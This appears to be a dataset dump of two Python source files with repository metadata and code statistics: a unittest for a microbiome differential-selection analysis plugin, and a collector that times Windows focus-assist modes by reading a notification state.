a6c69577266f38b8978dfee513a67b929ad88d18
|
[
"MIT"
] | null | null | null |
import json
from gene.core.constants import SAMPLE_METADATA_FILENAME
from gene.analysis.differential_selection import DifferentialSelection
from tests.analysis.analysis_test_utils import AnalysisTestUtils
from gene.model.metadata import Metadata
import unittest
class TestDifferentialSelection(unittest.TestCase):
def test_simple_differential_selection(self):
user_request = AnalysisTestUtils.create_default_user_request()
user_request.catvar = "Category"
user_request.set_custom_attr("pvalthreshold", "0.01")
user_request.set_custom_attr("pwVar1", "Control")
user_request.set_custom_attr("pwVar2", "Disease")
user_request.set_custom_attr("type", "ttest")
otu_table = AnalysisTestUtils.get_test_input_as_table(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
headers, sample_labels = AnalysisTestUtils.get_test_input_as_metadata(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
metadata_table = AnalysisTestUtils.get_test_input_as_table(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT, SAMPLE_METADATA_FILENAME)
metadata_col = AnalysisTestUtils.get_disease_metadata_values(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
taxonomic_map = AnalysisTestUtils.get_test_taxonomy(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
sample_ids_from_metadata = AnalysisTestUtils.get_sample_ids_from_metadata(
AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
sample_id_to_metadata = {}
i = 0
while i < len(sample_ids_from_metadata):
sample_id_to_metadata[sample_ids_from_metadata[i]] = metadata_col[i]
i += 1
metadata = Metadata("test", "test", False)
metadata.set_table(metadata_table)
plugin = DifferentialSelection()
abundances = plugin.analyse(user_request, otu_table, headers, sample_labels, sample_id_to_metadata, taxonomic_map)
print(json.dumps(abundances))
expected_output = AnalysisTestUtils.get_expected_output(AnalysisTestUtils.SIMPLE_TEST_CASE_OUTPUT_ROOT,
"differential_selection_control_disease.json")
comparison_output = AnalysisTestUtils.compare_two_objects(expected_output, abundances)
if not comparison_output:
print("Expected: ")
print(expected_output)
print("Actual: ")
print(abundances)
self.assertTrue(comparison_output)
def test_simple_differential_selection_with_ancom(self):
user_request = AnalysisTestUtils.create_default_user_request()
user_request.catvar = "Category"
user_request.set_custom_attr("pvalthreshold", "0.01")
user_request.set_custom_attr("pwVar1", "Control")
user_request.set_custom_attr("pwVar2", "Disease")
otu_table = AnalysisTestUtils.get_test_input_as_table(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
headers, sample_labels = AnalysisTestUtils.get_test_input_as_metadata(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
metadata_table = AnalysisTestUtils.get_test_input_as_table(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT, SAMPLE_METADATA_FILENAME)
metadata_col = AnalysisTestUtils.get_disease_metadata_values(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
taxonomic_map = AnalysisTestUtils.get_test_taxonomy(AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
sample_ids_from_metadata = AnalysisTestUtils.get_sample_ids_from_metadata(
AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT)
sample_id_to_metadata = {}
i = 0
while i < len(sample_ids_from_metadata):
sample_id_to_metadata[sample_ids_from_metadata[i]] = metadata_col[i]
i += 1
metadata = Metadata("test", "test", False)
metadata.set_table(metadata_table)
plugin = DifferentialSelection()
abundances = plugin.analyse_with_ancom(user_request, otu_table, headers, sample_labels, sample_id_to_metadata, taxonomic_map)
print(json.dumps(abundances))
expected_output = AnalysisTestUtils.get_expected_output(AnalysisTestUtils.SIMPLE_TEST_CASE_OUTPUT_ROOT,
"differential_selection_with_ancom_control_disease.json")
comparison_output = AnalysisTestUtils.compare_two_objects(expected_output, abundances)
if not comparison_output:
print("Expected: ")
print(expected_output)
print("Actual: ")
print(abundances)
self.assertTrue(comparison_output)
if __name__ == '__main__':
unittest.main()
| 52.034091
| 133
| 0.733566
| 499
| 4,579
| 6.266533
| 0.168337
| 0.052766
| 0.120883
| 0.138791
| 0.893508
| 0.864087
| 0.864087
| 0.864087
| 0.864087
| 0.864087
| 0
| 0.003805
| 0.196549
| 4,579
| 88
| 134
| 52.034091
| 0.846154
| 0
| 0
| 0.783784
| 0
| 0
| 0.058515
| 0.021179
| 0
| 0
| 0
| 0
| 0.027027
| 1
| 0.027027
| false
| 0
| 0.081081
| 0
| 0.121622
| 0.135135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0dd323410177a7748b63a33a52d02ac91453b73
| 3,452
|
py
|
Python
|
flowd/metrics/wnf_collectors.py
|
henrykp/fs_collect
|
ee06e76e974ab9e1041b8c1cff81956c11a28a35
|
[
"MIT"
] | null | null | null |
flowd/metrics/wnf_collectors.py
|
henrykp/fs_collect
|
ee06e76e974ab9e1041b8c1cff81956c11a28a35
|
[
"MIT"
] | null | null | null |
flowd/metrics/wnf_collectors.py
|
henrykp/fs_collect
|
ee06e76e974ab9e1041b8c1cff81956c11a28a35
|
[
"MIT"
] | null | null | null |
import logging
import threading
import time
from flowd.utils import wnf
from flowd.metrics import BaseCollector
PRIORITY_MODE = 1
ALERT_MODE = 2
class PriorityModeCollector(BaseCollector):
metric_name = "Time in Priority Mode (seconds)"
def __init__(self) -> None:
self.time_in_mode = 0.0
self.is_run = True
def stop_collect(self) -> None:
self.is_run = False
def start_collect(self) -> None:
start_time = time.time()
while self.is_run:
if wnf.do_read(wnf.format_state_name("WNF_SHEL_QUIETHOURS_ACTIVE_PROFILE_CHANGED")) == PRIORITY_MODE:
self.time_in_mode += time.time() - start_time
start_time = time.time()
time.sleep(1)
def get_current_state(self) -> tuple:
t = int(round(self.time_in_mode))
logging.debug(f'Time in priority mode: {t}')
return self.metric_name, t
def cleanup(self) -> None:
self.is_run = True
self.time_in_mode = 0
class AlertModeCollector(BaseCollector):
metric_name = "Time in Alerts Only Mode (seconds)"
def __init__(self) -> None:
self.time_in_mode = 0.0
self.is_run = True
def stop_collect(self) -> None:
self.is_run = False
def start_collect(self) -> None:
start_time = time.time()
while self.is_run:
if wnf.do_read(wnf.format_state_name("WNF_SHEL_QUIETHOURS_ACTIVE_PROFILE_CHANGED")) == ALERT_MODE:
self.time_in_mode += time.time() - start_time
start_time = time.time()
time.sleep(1)
def get_current_state(self) -> tuple:
t = int(round(self.time_in_mode))
logging.debug(f'Time in alert mode: {t}')
return self.metric_name, t
def cleanup(self) -> None:
self.time_in_mode = 0
self.is_run = True
if __name__ == '__main__':
# Example of usage
logging.basicConfig(level=logging.DEBUG, format="%(levelname)-8s %(message)s")
collector = PriorityModeCollector()
x = threading.Thread(target=collector.start_collect, args=())
logging.debug("Main : create and start thread")
x.start()
logging.debug("Main : wait for the thread to finish")
time.sleep(10)
logging.debug("Main : stop collect")
collector.stop_collect()
metric_name, value = collector.get_current_state()
logging.info(f'metric_name {metric_name}')
logging.info(f'value {value}')
logging.debug("Main : cleanup")
collector.cleanup()
metric_name, value = collector.get_current_state()
logging.info(f'metric_name {metric_name}')
logging.info(f'value {value}')
assert value == 0
logging.basicConfig(level=logging.DEBUG, format="%(levelname)-8s %(message)s")
collector = AlertModeCollector()
x = threading.Thread(target=collector.start_collect, args=())
logging.debug("Main : create and start thread")
x.start()
logging.debug("Main : wait for the thread to finish")
time.sleep(30)
logging.debug("Main : stop collect")
collector.stop_collect()
metric_name, value = collector.get_current_state()
logging.info(f'metric_name {metric_name}')
logging.info(f'value {value}')
logging.debug("Main : cleanup")
collector.cleanup()
metric_name, value = collector.get_current_state()
logging.info(f'metric_name {metric_name}')
logging.info(f'value {value}')
assert value == 0
| 30.821429
| 113
| 0.651506
| 453
| 3,452
| 4.739514
| 0.187638
| 0.074523
| 0.037261
| 0.052166
| 0.868188
| 0.825803
| 0.825803
| 0.82068
| 0.82068
| 0.82068
| 0
| 0.00679
| 0.232039
| 3,452
| 111
| 114
| 31.099099
| 0.803093
| 0.004635
| 0
| 0.767442
| 0
| 0
| 0.184624
| 0.024461
| 0
| 0
| 0
| 0
| 0.023256
| 1
| 0.116279
| false
| 0
| 0.05814
| 0
| 0.244186
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.